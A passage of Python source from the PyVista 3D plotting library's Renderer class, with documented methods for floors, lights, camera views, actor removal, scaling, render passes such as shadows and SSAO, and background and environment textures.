self.bounds[0] - (ranges[0] * offset)\n normal = (1, 0, 0)\n i_size = ranges[2]\n j_size = ranges[1]\n elif face.lower() in '+z':\n center[2] = self.bounds[5] + (ranges[2] * offset)\n normal = (0, 0, -1)\n i_size = ranges[0]\n j_size = ranges[1]\n elif face.lower() in '+y':\n center[1] = self.bounds[3] + (ranges[1] * offset)\n normal = (0, -1, 0)\n i_size = ranges[0]\n j_size = ranges[2]\n elif face.lower() in '+x':\n center[0] = self.bounds[1] + (ranges[0] * offset)\n normal = (-1, 0, 0)\n i_size = ranges[2]\n j_size = ranges[1]\n else:\n raise NotImplementedError(f'Face ({face}) not implemented')\n self._floor = pyvista.Plane(\n center=center,\n direction=normal,\n i_size=i_size,\n j_size=j_size,\n i_resolution=i_resolution,\n j_resolution=j_resolution,\n )\n self._floor.clear_data()\n\n if lighting is None:\n lighting = self._theme.lighting\n\n self.remove_bounding_box()\n mapper = _vtk.vtkDataSetMapper()\n mapper.SetInputData(self._floor)\n actor, prop = self.add_actor(\n mapper, reset_camera=reset_camera, name=f'Floor({face})', pickable=pickable\n )\n\n prop.SetColor(Color(color, default_color=self._theme.floor_color).float_rgb)\n prop.SetOpacity(opacity)\n\n # edge display style\n if show_edges:\n prop.EdgeVisibilityOn()\n prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb)\n\n # lighting display style\n if lighting is False:\n prop.LightingOff()\n\n # set line thickness\n if line_width:\n prop.SetLineWidth(line_width)\n\n prop.SetRepresentationToSurface()\n self._floors.append(actor)\n return actor\n\n def remove_floors(self, clear_kwargs=True, render=True):\n \"\"\"Remove all floor actors.\n\n Parameters\n ----------\n clear_kwargs : bool, default: True\n Clear default floor arguments.\n\n render : bool, default: True\n Render upon removing the floor.\n\n Examples\n --------\n Add a floor below a sphere, remove it, and then plot it.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> actor = pl.add_floor()\n >>> pl.remove_floors()\n >>> pl.show()\n\n \"\"\"\n if getattr(self, '_floor', None) is not None:\n self._floor.ReleaseData()\n self._floor = None\n for actor in self._floors:\n self.remove_actor(actor, reset_camera=False, render=render)\n self._floors.clear()\n if clear_kwargs:\n self._floor_kwargs.clear()\n\n def remove_bounds_axes(self):\n \"\"\"Remove bounds axes.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter(shape=(1, 2))\n >>> pl.subplot(0, 0)\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> actor = pl.show_bounds(grid='front', location='outer')\n >>> pl.subplot(0, 1)\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> actor = pl.show_bounds(grid='front', location='outer')\n >>> actor = pl.remove_bounds_axes()\n >>> pl.show()\n\n \"\"\"\n if self.cube_axes_actor is not None:\n self.remove_actor(self.cube_axes_actor)\n self.cube_axes_actor = None\n self.Modified()\n\n def add_light(self, light):\n \"\"\"Add a light to the renderer.\n\n Parameters\n ----------\n light : vtk.vtkLight or pyvista.Light\n Light to add.\n\n \"\"\"\n # convert from a vtk type if applicable\n if isinstance(light, _vtk.vtkLight) and not isinstance(light, pyvista.Light):\n light = pyvista.Light.from_vtk(light)\n\n if not isinstance(light, pyvista.Light):\n raise TypeError(f'Expected Light instance, got {type(light).__name__} instead.')\n self._lights.append(light)\n self.AddLight(light)\n self.Modified()\n\n # we add the renderer to add/remove the light actor if\n # positional or cone angle is modified\n light.add_renderer(self)\n\n @property\n def lights(self): # numpydoc ignore=RT01\n \"\"\"Return a list of all lights in the renderer.\n\n Returns\n -------\n list\n Lights in the renderer.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.renderer.lights # doctest:+SKIP\n [,\n ,\n ,\n ,\n ]\n\n \"\"\"\n return list(self.GetLights())\n\n def remove_all_lights(self):\n \"\"\"Remove all lights from the renderer.\"\"\"\n self.RemoveAllLights()\n self._lights.clear()\n\n def clear_actors(self):\n \"\"\"Remove all actors (keep lights and properties).\"\"\"\n if self._actors:\n for actor in list(self._actors):\n try:\n self.remove_actor(actor, reset_camera=False, render=False)\n except KeyError:\n pass\n self.Modified()\n\n def clear(self):\n \"\"\"Remove all actors and properties.\"\"\"\n self.clear_actors()\n if self.__charts is not None:\n self._charts.deep_clean()\n self.remove_all_lights()\n self.RemoveAllViewProps()\n self.Modified()\n\n self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))\n self._scalar_bar_slot_lookup = {}\n\n def set_focus(self, point):\n \"\"\"Set focus to a point.\n\n Parameters\n ----------\n point : sequence[float]\n Cartesian point to focus on in the form of ``[x, y, z]``.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> mesh = pv.Cube()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh, show_edges=True)\n >>> _ = pl.add_point_labels([mesh.points[1]], [\"Focus\"])\n >>> _ = pl.camera # this initializes the camera\n >>> pl.set_focus(mesh.points[1])\n >>> pl.show()\n\n \"\"\"\n if isinstance(point, np.ndarray):\n if point.ndim != 1:\n point = point.ravel()\n self.camera.focal_point = scale_point(self.camera, point, invert=False)\n self.camera_set = True\n self.Modified()\n\n def set_position(self, point, reset=False, render=True):\n \"\"\"Set camera position to a point.\n\n Parameters\n ----------\n point : sequence\n Cartesian point to focus on in the form of ``[x, y, z]``.\n\n reset : bool, default: False\n Whether to reset the camera after setting the camera\n position.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the position.\n\n Examples\n --------\n Move the camera far away to ``[7, 7, 7]``.\n\n >>> import pyvista as pv\n >>> mesh = pv.Cube()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh, show_edges=True)\n >>> pl.set_position([7, 7, 7])\n >>> pl.show()\n\n \"\"\"\n if isinstance(point, np.ndarray):\n if point.ndim != 1:\n point = point.ravel()\n self.camera.position = scale_point(self.camera, point, invert=False)\n if reset:\n self.reset_camera(render=render)\n self.camera_set = True\n self.Modified()\n\n def set_viewup(self, vector, reset=True, render=True):\n \"\"\"Set camera viewup vector.\n\n Parameters\n ----------\n vector : sequence[float]\n New camera viewup vector.\n\n reset : bool, default: True\n Whether to reset the camera after setting the camera\n position.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the viewup.\n\n Examples\n --------\n Look from the top down by setting view up to ``[0, 1, 0]``.\n Notice how the Y axis appears vertical.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.set_viewup([0, 1, 0])\n >>> pl.show()\n\n \"\"\"\n if isinstance(vector, np.ndarray):\n if vector.ndim != 1:\n vector = vector.ravel()\n\n self.camera.up = vector\n if reset:\n self.reset_camera(render=render)\n\n self.camera_set = True\n self.Modified()\n\n def enable_parallel_projection(self):\n \"\"\"Enable parallel projection.\n\n The camera will have a parallel projection. Parallel projection is\n often useful when viewing images or 2D datasets.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> from pyvista import demos\n >>> pl = pv.demos.orientation_plotter()\n >>> pl.enable_parallel_projection()\n >>> pl.show()\n\n \"\"\"\n # Fix the 'reset camera' effect produced by the VTK when parallel\n # projection is enabled.\n angle = np.radians(self.camera.view_angle)\n self.camera.parallel_scale = self.camera.distance * np.sin(0.5 * angle)\n\n self.camera.enable_parallel_projection()\n self.Modified()\n\n def disable_parallel_projection(self):\n \"\"\"Reset the camera to use perspective projection.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> from pyvista import demos\n >>> pl = pv.demos.orientation_plotter()\n >>> pl.disable_parallel_projection()\n >>> pl.show()\n\n \"\"\"\n # Fix the 'reset camera' effect produced by the VTK when parallel\n # projection is disabled.\n focus = self.camera.focal_point\n angle = np.radians(self.camera.view_angle)\n distance = self.camera.parallel_scale / np.sin(0.5 * angle)\n direction = self.camera.direction\n x = focus[0] - distance * direction[0]\n y = focus[1] - distance * direction[1]\n z = focus[2] - distance * direction[2]\n self.camera.position = (x, y, z)\n self.ResetCameraClippingRange()\n\n self.camera.disable_parallel_projection()\n self.Modified()\n\n @property\n def parallel_projection(self): # numpydoc ignore=RT01\n \"\"\"Return parallel projection state of active render window.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.parallel_projection = False\n >>> pl.parallel_projection\n False\n \"\"\"\n return self.camera.parallel_projection\n\n @parallel_projection.setter\n def parallel_projection(self, state): # numpydoc ignore=GL08\n self.camera.parallel_projection = state\n self.Modified()\n\n @property\n def parallel_scale(self): # numpydoc ignore=RT01\n \"\"\"Return parallel scale of active render window.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.parallel_scale = 2\n \"\"\"\n return self.camera.parallel_scale\n\n @parallel_scale.setter\n def parallel_scale(self, value): # numpydoc ignore=GL08\n self.camera.parallel_scale = value\n self.Modified()\n\n def remove_actor(self, actor, reset_camera=False, render=True):\n \"\"\"Remove an actor from the Renderer.\n\n Parameters\n ----------\n actor : str, vtk.vtkActor, list or tuple\n If the type is ``str``, removes the previously added actor\n with the given name. If the type is ``vtk.vtkActor``,\n removes the actor if it's previously added to the\n Renderer. If ``list`` or ``tuple``, removes iteratively\n each actor.\n\n reset_camera : bool, optional\n Resets camera so all actors can be seen.\n\n render : bool, optional\n Render upon actor removal. Set this to ``False`` to stop\n the render window from rendering when an actor is removed.\n\n Returns\n -------\n bool\n ``True`` when actor removed. ``False`` when actor has not\n been removed.\n\n Examples\n --------\n Add two meshes to a plotter and then remove the sphere actor.\n\n >>> import pyvista as pv\n >>> mesh = pv.Cube()\n >>> pl = pv.Plotter()\n >>> cube_actor = pl.add_mesh(pv.Cube(), show_edges=True)\n >>> sphere_actor = pl.add_mesh(pv.Sphere(), show_edges=True)\n >>> _ = pl.remove_actor(cube_actor)\n >>> pl.show()\n\n \"\"\"\n name = None\n if isinstance(actor, str):\n name = actor\n keys = list(self._actors.keys())\n names = []\n for k in keys:\n if k.startswith(f'{name}-'):\n names.append(k)\n if len(names) > 0:\n self.remove_actor(names, reset_camera=reset_camera, render=render)\n try:\n actor = self._actors[name]\n except KeyError:\n # If actor of that name is not present then return success\n return False\n if isinstance(actor, collections.abc.Iterable):\n success = False\n for a in actor:\n rv = self.remove_actor(a, reset_camera=reset_camera, render=render)\n if rv or success:\n success = True\n return success\n if actor is None:\n return False\n\n # remove any labels associated with the actor\n self._labels.pop(actor.GetAddressAsString(\"\"), None)\n\n # ensure any scalar bars associated with this actor are removed\n try:\n self.parent.scalar_bars._remove_mapper_from_plotter(actor)\n except (AttributeError, ReferenceError):\n pass\n self.RemoveActor(actor)\n\n if name is None:\n for k, v in self._actors.items():\n if v == actor:\n name = k\n self._actors.pop(name, None)\n self.update_bounds_axes()\n if reset_camera:\n self.reset_camera(render=render)\n elif not self.camera_set and reset_camera is None:\n self.reset_camera(render=render)\n elif render:\n self.parent.render()\n\n self.Modified()\n return True\n\n def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True, render=True):\n \"\"\"Scale all the actors in the scene.\n\n Scaling in performed independently on the X, Y and Z axis.\n A scale of zero is illegal and will be replaced with one.\n\n .. warning::\n Setting the scale on the renderer is a convenience method to\n individually scale each of the actors in the scene. If a scale\n was set on an actor previously, it will be reset to the scale\n of this Renderer.\n\n Parameters\n ----------\n xscale : float, optional\n Scaling in the x direction. Default is ``None``, which\n does not change existing scaling.\n\n yscale : float, optional\n Scaling in the y direction. Default is ``None``, which\n does not change existing scaling.\n\n zscale : float, optional\n Scaling in the z direction. Default is ``None``, which\n does not change existing scaling.\n\n reset_camera : bool, default: True\n Resets camera so all actors can be seen.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the scale.\n\n Examples\n --------\n Set the scale in the z direction to be 2 times that of\n nominal. Leave the other axes unscaled.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.set_scale(zscale=2)\n >>> _ = pl.add_mesh(pv.Sphere()) # perfect sphere\n >>> pl.show()\n\n \"\"\"\n if xscale is None:\n xscale = self.scale[0]\n if yscale is None:\n yscale = self.scale[1]\n if zscale is None:\n zscale = self.scale[2]\n self.scale = [xscale, yscale, zscale]\n\n # Reset all actors to match this scale\n for actor in self.actors.values():\n if hasattr(actor, 'SetScale'):\n actor.SetScale(self.scale)\n\n self.parent.render()\n if reset_camera:\n self.update_bounds_axes()\n self.reset_camera(render=render)\n self.Modified()\n\n def get_default_cam_pos(self, negative=False):\n \"\"\"Return the default focal points and viewup.\n\n Uses ResetCamera to make a useful view.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n Returns\n -------\n list\n List of camera position:\n\n * Position\n * Focal point\n * View up\n\n \"\"\"\n focal_pt = self.center\n if any(np.isnan(focal_pt)):\n focal_pt = (0.0, 0.0, 0.0)\n position = np.array(self._theme.camera['position']).astype(float)\n if negative:\n position *= -1\n position = position / np.array(self.scale).astype(float)\n cpos = [position + np.array(focal_pt), focal_pt, self._theme.camera['viewup']]\n return cpos\n\n def update_bounds_axes(self):\n \"\"\"Update the bounds axes of the render window.\"\"\"\n if (\n hasattr(self, '_box_object')\n and self._box_object is not None\n and self.bounding_box_actor is not None\n ):\n if not np.allclose(self._box_object.bounds, self.bounds):\n color = self.bounding_box_actor.GetProperty().GetColor()\n self.remove_bounding_box()\n self.add_bounding_box(color=color)\n self.remove_floors(clear_kwargs=False)\n for floor_kwargs in self._floor_kwargs:\n floor_kwargs['store_floor_kwargs'] = False\n self.add_floor(**floor_kwargs)\n if self.cube_axes_actor is not None:\n self.cube_axes_actor.update_bounds(self.bounds)\n if not np.allclose(self.scale, [1.0, 1.0, 1.0]):\n self.cube_axes_actor.SetUse2DMode(True)\n else:\n self.cube_axes_actor.SetUse2DMode(False)\n self.Modified()\n\n def reset_camera(self, render=True, bounds=None):\n \"\"\"Reset the camera of the active render window.\n\n The camera slides along the vector defined from camera\n position to focal point until all of the actors can be seen.\n\n Parameters\n ----------\n render : bool, default: True\n Trigger a render after resetting the camera.\n\n bounds : iterable(int), optional\n Automatically set up the camera based on a specified bounding box\n ``(xmin, xmax, ymin, ymax, zmin, zmax)``.\n\n Examples\n --------\n Add a mesh and place the camera position too close to the\n mesh. Then reset the camera and show the mesh.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere(), show_edges=True)\n >>> pl.set_position((0, 0.1, 0.1))\n >>> pl.reset_camera()\n >>> pl.show()\n\n \"\"\"\n if bounds is not None:\n self.ResetCamera(*bounds)\n else:\n self.ResetCamera()\n\n self.reset_camera_clipping_range()\n\n if render:\n self.parent.render()\n self.Modified()\n\n def isometric_view(self):\n \"\"\"Reset the camera to a default isometric view.\n\n DEPRECATED: Please use ``view_isometric``.\n\n \"\"\"\n self.view_isometric()\n\n def view_isometric(self, negative=False, render=True):\n \"\"\"Reset the camera to a default isometric view.\n\n The view will show all the actors in the scene.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the other isometric direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n Isometric view.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.view_isometric()\n >>> pl.show()\n\n Negative isometric view.\n\n >>> from pyvista import demos\n >>> pl = demos.orientation_plotter()\n >>> pl.view_isometric(negative=True)\n >>> pl.show()\n\n \"\"\"\n position = self.get_default_cam_pos(negative=negative)\n self.camera_position = CameraPosition(*position)\n self.camera_set = negative\n self.reset_camera(render=render)\n\n def view_vector(self, vector, viewup=None, render=True):\n \"\"\"Point the camera in the direction of the given vector.\n\n Parameters\n ----------\n vector : sequence[float]\n Direction to point the camera in.\n\n viewup : sequence[float], optional\n Sequence describing the view up of the camera.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n \"\"\"\n focal_pt = self.center\n if viewup is None:\n viewup = self._theme.camera['viewup']\n cpos = CameraPosition(vector + np.array(focal_pt), focal_pt, viewup)\n self.camera_position = cpos\n self.reset_camera(render=render)\n\n def view_xy(self, negative=False, render=True):\n \"\"\"View the XY plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the XY plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_xy()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('xy', negative=negative), render=render)\n\n def view_yx(self, negative=False, render=True):\n \"\"\"View the YX plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the YX plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_yx()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('yx', negative=negative), render=render)\n\n def view_xz(self, negative=False, render=True):\n \"\"\"View the XZ plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the XZ plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_xz()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('xz', negative=negative), render=render)\n\n def view_zx(self, negative=False, render=True):\n \"\"\"View the ZX plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the ZX plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_zx()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('zx', negative=negative), render=render)\n\n def view_yz(self, negative=False, render=True):\n \"\"\"View the YZ plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the YZ plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_yz()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('yz', negative=negative), render=render)\n\n def view_zy(self, negative=False, render=True):\n \"\"\"View the ZY plane.\n\n Parameters\n ----------\n negative : bool, default: False\n View from the opposite direction.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after setting the camera position.\n\n Examples\n --------\n View the ZY plane of a built-in mesh example.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> airplane = examples.load_airplane()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(airplane)\n >>> pl.view_zy()\n >>> pl.show()\n\n \"\"\"\n self.view_vector(*view_vectors('zy', negative=negative), render=render)\n\n def disable(self):\n \"\"\"Disable this renderer's camera from being interactive.\"\"\"\n self.SetInteractive(0)\n\n def enable(self):\n \"\"\"Enable this renderer's camera to be interactive.\"\"\"\n self.SetInteractive(1)\n\n def add_blurring(self):\n \"\"\"Add blurring.\n\n This can be added several times to increase the degree of blurring.\n\n Examples\n --------\n Add two blurring passes to the plotter and show it.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere(), show_edges=True)\n >>> pl.add_blurring()\n >>> pl.add_blurring()\n >>> pl.show()\n\n See :ref:`blur_example` for a full example using this method.\n\n \"\"\"\n self._render_passes.add_blur_pass()\n\n def remove_blurring(self):\n \"\"\"Remove a single blurring pass.\n\n You will need to run this multiple times to remove all blurring passes.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere())\n >>> pl.add_blurring()\n >>> pl.remove_blurring()\n >>> pl.show()\n\n \"\"\"\n self._render_passes.remove_blur_pass()\n\n def enable_depth_of_field(self, automatic_focal_distance=True):\n \"\"\"Enable depth of field plotting.\n\n Parameters\n ----------\n automatic_focal_distance : bool, default: True\n Use automatic focal distance calculation. When enabled, the center\n of the viewport will always be in focus regardless of where the\n focal point is.\n\n Examples\n --------\n Create five spheres and demonstrate the effect of depth of field.\n\n >>> import pyvista as pv\n >>> from pyvista import examples\n >>> pl = pv.Plotter(lighting=\"three lights\")\n >>> pl.background_color = \"w\"\n >>> for i in range(5):\n ... mesh = pv.Sphere(center=(-i * 4, 0, 0))\n ... color = [0, 255 - i * 20, 30 + i * 50]\n ... _ = pl.add_mesh(\n ... mesh,\n ... show_edges=False,\n ... pbr=True,\n ... metallic=1.0,\n ... color=color,\n ... )\n ...\n >>> pl.camera.zoom(1.8)\n >>> pl.camera_position = [\n ... (4.74, 0.959, 0.525),\n ... (0.363, 0.3116, 0.132),\n ... (-0.088, -0.0075, 0.996),\n ... ]\n >>> pl.enable_depth_of_field()\n >>> pl.show()\n\n See :ref:`depth_of_field_example` for a full example using this method.\n\n \"\"\"\n self._render_passes.enable_depth_of_field_pass(automatic_focal_distance)\n\n def disable_depth_of_field(self):\n \"\"\"Disable depth of field plotting.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=\"three lights\")\n >>> pl.enable_depth_of_field()\n >>> pl.disable_depth_of_field()\n\n \"\"\"\n self._render_passes.disable_depth_of_field_pass()\n\n def enable_eye_dome_lighting(self):\n \"\"\"Enable eye dome lighting (EDL).\n\n Returns\n -------\n vtk.vtkOpenGLRenderer\n VTK renderer with eye dome lighting pass.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.enable_eye_dome_lighting()\n\n \"\"\"\n self._render_passes.enable_edl_pass()\n\n def disable_eye_dome_lighting(self):\n \"\"\"Disable eye dome lighting (EDL).\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.disable_eye_dome_lighting()\n\n \"\"\"\n self._render_passes.disable_edl_pass()\n\n def enable_shadows(self):\n \"\"\"Enable shadows.\n\n Examples\n --------\n First, plot without shadows enabled (default)\n\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter(lighting='none', window_size=(1000, 1000))\n >>> light = pv.Light()\n >>> light.set_direction_angle(20, -20)\n >>> pl.add_light(light)\n >>> _ = pl.add_mesh(mesh, color='white', smooth_shading=True)\n >>> _ = pl.add_mesh(pv.Box((-1.2, -1, -1, 1, -1, 1)))\n >>> pl.show()\n\n Now, enable shadows.\n\n >>> import pyvista as pv\n >>> mesh = pv.Sphere()\n >>> pl = pv.Plotter(lighting='none', window_size=(1000, 1000))\n >>> light = pv.Light()\n >>> light.set_direction_angle(20, -20)\n >>> pl.add_light(light)\n >>> _ = pl.add_mesh(mesh, color='white', smooth_shading=True)\n >>> _ = pl.add_mesh(pv.Box((-1.2, -1, -1, 1, -1, 1)))\n >>> pl.enable_shadows()\n >>> pl.show()\n\n \"\"\"\n self._render_passes.enable_shadow_pass()\n\n def disable_shadows(self):\n \"\"\"Disable shadows.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.disable_shadows()\n\n \"\"\"\n self._render_passes.disable_shadow_pass()\n\n def enable_ssao(self, radius=0.5, bias=0.005, kernel_size=256, blur=True):\n \"\"\"Enable surface space ambient occlusion (SSAO).\n\n SSAO can approximate shadows more efficiently than ray-tracing\n and produce similar results. Use this when you wish to plot the\n occlusion effect that nearby meshes have on each other by blocking\n nearby light sources.\n\n See `Kitware: Screen-Space Ambient Occlusion\n `_ for more details\n\n Parameters\n ----------\n radius : float, default: 0.5\n Neighbor pixels considered when computing the occlusion.\n\n bias : float, default: 0.005\n Tolerance factor used when comparing pixel depth.\n\n kernel_size : int, default: 256\n Number of samples used. This controls the quality where a higher\n number increases the quality at the expense of computation time.\n\n blur : bool, default: True\n Controls if occlusion buffer should be blurred before combining it\n with the color buffer.\n\n Examples\n --------\n Generate a :class:`pyvista.UnstructuredGrid` with many tetrahedrons\n nearby each other and plot it without SSAO.\n\n >>> import pyvista as pv\n >>> ugrid = pv.ImageData(dimensions=(3, 2, 2)).to_tetrahedra(12)\n >>> exploded = ugrid.explode()\n >>> exploded.plot()\n\n Enable SSAO with the default parameters.\n\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(exploded)\n >>> pl.enable_ssao()\n >>> pl.show()\n\n \"\"\"\n self._render_passes.enable_ssao_pass(radius, bias, kernel_size, blur)\n\n def disable_ssao(self):\n \"\"\"Disable surface space ambient occlusion (SSAO).\"\"\"\n self._render_passes.disable_ssao_pass()\n\n def get_pick_position(self):\n \"\"\"Get the pick position/area as ``x0, y0, x1, y1``.\n\n Returns\n -------\n tuple\n Pick position as ``x0, y0, x1, y1``.\n\n \"\"\"\n x0 = int(self.GetPickX1())\n x1 = int(self.GetPickX2())\n y0 = int(self.GetPickY1())\n y1 = int(self.GetPickY2())\n return x0, y0, x1, y1\n\n def set_background(self, color, top=None, right=None, side=None, corner=None):\n \"\"\"Set the background color of this renderer.\n\n Parameters\n ----------\n color : ColorLike, optional\n Either a string, rgb list, or hex color string. Defaults\n to theme default. For example:\n\n * ``color='white'``\n * ``color='w'``\n * ``color=[1.0, 1.0, 1.0]``\n * ``color='#FFFFFF'``\n\n top : ColorLike, optional\n If given, this will enable a gradient background where the\n ``color`` argument is at the bottom and the color given in\n ``top`` will be the color at the top of the renderer.\n\n right : ColorLike, optional\n If given, this will enable a gradient background where the\n ``color`` argument is at the left and the color given in\n ``right`` will be the color at the right of the renderer.\n\n side : ColorLike, optional\n If given, this will enable a gradient background where the\n ``color`` argument is at the center and the color given in\n ``side`` will be the color at the side of the renderer.\n\n corner : ColorLike, optional\n If given, this will enable a gradient background where the\n ``color`` argument is at the center and the color given in\n ``corner`` will be the color at the corner of the renderer.\n\n Examples\n --------\n Set the background color to black with a gradient to white at\n the top of the plot.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Cone())\n >>> pl.set_background('black', top='white')\n >>> pl.show()\n\n \"\"\"\n self.SetBackground(Color(color, default_color=self._theme.background).float_rgb)\n if not (right is side is corner is None) and vtk_version_info < (9, 3): # pragma: no cover\n from pyvista.core.errors import VTKVersionError\n\n raise VTKVersionError(\n \"`right` or `side` or `corner` cannot be used under VTK v9.3.0. Try installing VTK v9.3.0 or newer.\"\n )\n if not (\n (top is right is side is corner is None)\n or (top is not None and right is side is corner is None)\n or (right is not None and top is side is corner is None)\n or (side is not None and top is right is corner is None)\n or (corner is not None and top is right is side is None)\n ): # pragma: no cover\n raise ValueError(\"You can only set one argument in top, right, side, corner.\")\n if top is not None:\n self.SetGradientBackground(True)\n self.SetBackground2(Color(top).float_rgb)\n elif right is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(_vtk.vtkViewport.GradientModes.VTK_GRADIENT_HORIZONTAL)\n self.SetBackground2(Color(right).float_rgb)\n elif side is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(\n _vtk.vtkViewport.GradientModes.VTK_GRADIENT_RADIAL_VIEWPORT_FARTHEST_SIDE\n )\n self.SetBackground2(Color(side).float_rgb)\n elif corner is not None: # pragma: no cover\n self.SetGradientBackground(True)\n self.SetGradientMode(\n _vtk.vtkViewport.GradientModes.VTK_GRADIENT_RADIAL_VIEWPORT_FARTHEST_CORNER\n )\n self.SetBackground2(Color(corner).float_rgb)\n else:\n self.SetGradientBackground(False)\n self.Modified()\n\n def set_environment_texture(self, texture, is_srgb=False):\n \"\"\"Set the environment texture used for image based lighting.\n\n This texture is supposed to represent the scene background. If\n it is not a cubemap, the texture is supposed to represent an\n equirectangular projection. If used with raytracing backends,\n the texture must be an equirectangular projection and must be\n constructed with a valid ``vtk.vtkImageData``.\n\n Parameters\n ----------\n texture : pyvista.Texture\n Texture.\n\n is_srgb : bool, default: False\n If the texture is in sRGB color space, set the color flag on the\n texture or set this parameter to ``True``. Textures are assumed\n to be in linear color space by default.\n\n Examples\n --------\n Add a skybox cubemap as an environment texture and show that the\n lighting from the texture is mapped on to a sphere dataset. Note how\n even when disabling the default lightkit, the scene lighting will still\n be mapped onto the actor.\n\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=None)\n >>> cubemap = examples.download_sky_box_cube_map()\n >>> _ = pl.add_mesh(\n ... pv.Sphere(), pbr=True, metallic=0.9, roughness=0.4\n ... )\n >>> pl.set_environment_texture(cubemap)\n >>> pl.camera_position = 'xy'\n >>> pl.show()\n\n \"\"\"\n # cube_map textures cannot use spherical harmonics\n if texture.cube_map:\n self.AutomaticLightCreationOff()\n # disable spherical harmonics was added in 9.1.0\n if hasattr(self, 'UseSphericalHarmonicsOff'):\n self.UseSphericalHarmonicsOff()\n\n self.UseImageBasedLightingOn()\n self.SetEnvironmentTexture(texture, is_srgb)\n self.Modified()\n\n def remove_environment_texture(self):\n \"\"\"Remove the environment texture.\n\n Examples\n --------\n >>> from pyvista import examples\n >>> import pyvista as pv\n >>> pl = pv.Plotter(lighting=None)\n >>> cubemap = examples.download_sky_box_cube_map()\n >>> _ = 